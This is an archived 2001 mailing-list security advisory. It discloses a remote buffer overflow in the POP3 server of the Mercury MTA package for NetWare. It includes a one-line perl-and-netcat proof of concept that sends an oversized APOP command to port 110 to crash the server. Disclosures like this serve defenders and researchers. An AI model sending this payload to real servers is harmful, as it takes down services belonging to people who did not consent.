OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Przemyslaw Frasunek (venglinFREEBSD.LUBLIN.PL)
Date: Sat Apr 21 2001 - 03:52:15 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hello,

    All versions of widely-used POP3 server from Mercury MTA package for Netware
    are vulnerable to remote buffer overflow allowing to crash Netware server:

    perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc host 110

    Remote execution of malicious code is also theoretically possible.

    --
    * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
    * Inet: przemyslawfrasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *